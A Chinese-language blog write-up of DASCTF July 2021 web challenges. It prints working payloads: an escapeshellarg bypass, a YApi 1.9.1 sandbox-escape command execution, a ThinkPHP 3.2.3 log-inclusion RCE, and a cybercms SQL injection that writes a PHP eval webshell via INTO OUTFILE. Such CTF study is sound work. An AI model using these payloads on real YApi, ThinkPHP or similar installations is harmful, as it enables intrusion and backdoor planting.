21DASCTFJuly

CTF
Word count: 674   |   Reading time≈ 3 min

web

您的排名:148 慢慢复现有时间

image-20210801183537143

cat flag

image-20210801180135739

1
2
3
4
5
6
7
<?php
if (isset($_GET['cmd'])) {  
    $cmd = $_GET['cmd'];  
if (!preg_match('/flag/i',$cmd))  {    
    $cmd = escapeshellarg($cmd);    
    system('cat ' . $cmd);  }} 
else {  highlight_file(__FILE__);}?>

image-20210801180247394

猜测命令执行查看历史命令文件

1
cat ~/.bash_history

escapeshellarg()函数 把字符串转码为可以在 shell 命令里使用的参数,不会绕过。。。

记录

看过wp才知道要想读日志,nginx日志默认路径/var/log/nginx/access.log

image-20210820123025756

image-20210820123606239

escapeshellarg()利用非ascii字符绕过,%aa,%ba,%fa

image-20210820125330839

image-20210820125339970

YApi

版本1.9.1 刚爆出个漏洞。

注册,创建项目

image-20210801180737592

这里可以命令执行

1
2
3
4
5
6
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("command").toString()

image-20210801180857819

保存后,添加接口

image-20210801180938961

访问接口

image-20210801181000869

即可看到命令执行结果,直接命令执行得flag

image-20210801181010300

参考:

Thinkphp

v3.2.3直接网上找rce

image-20210801181452123

1
/index.php?m=--><?=phpinfo();?>

要burp中 执行,url中执行不行

image-20210801182210100

查看对应日志文件,注意日志时间

1
index.php/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_01.log

image-20210801182233463

命令执行成功,

上马

image-20210801182553174

蚁剑连接好像不太行,奇怪有时候可以

image-20210801182808593

找到flag

image-20210801183006727

参考

cybercms

根据网上爆出了sql注入,在后台登陆处,

然后根据目录扫描www.zip

1
2
3
$user=fl_html(f1_vvv(fl_value($_POST['user'])));

$password=fl_html(f1_vvv(fl_value($_POST['password'])));
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
f1_vvv  函数

function f1_vvv($str){
	if(empty($str)){return;}
	if(preg_match("/\ /i", $str)){
		exit('Go away,bad hacker!!');
	}
	preg_replace('/0x/i','',$str);
    return $str;
}

function fl_value($str){
	if(empty($str)){return;}
	return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/i','',$str);
}

分析源码得到过滤了空格0x,fl_value函数对一些关键词做了过滤,

判断5列

image-20210912182056650

但是后门写马时候也要注意部分关键字被replace为空格

后门马

image-20210912184824092

例如

1
2

user=admin'/**/union/**/select/**/null,null,null,null,CHAR(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)/**/into/**/outfile/**/'/var/www/html/upload/shell.php'#&password=dd&code=&submit=true&submit.x=16&submit.y=29

response

1
bad!hacker!<br>sql:select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name='admin'/**/union/**//**/null,null,null,null,CHAR(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)/**/into/**//**/'/var/www/html/upload/shell.php'#' limit 0,1

select,outfile要双写

image-20210912183311495

查看后门

image-20210912183414063

命令执行

image-20210912184256103

  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信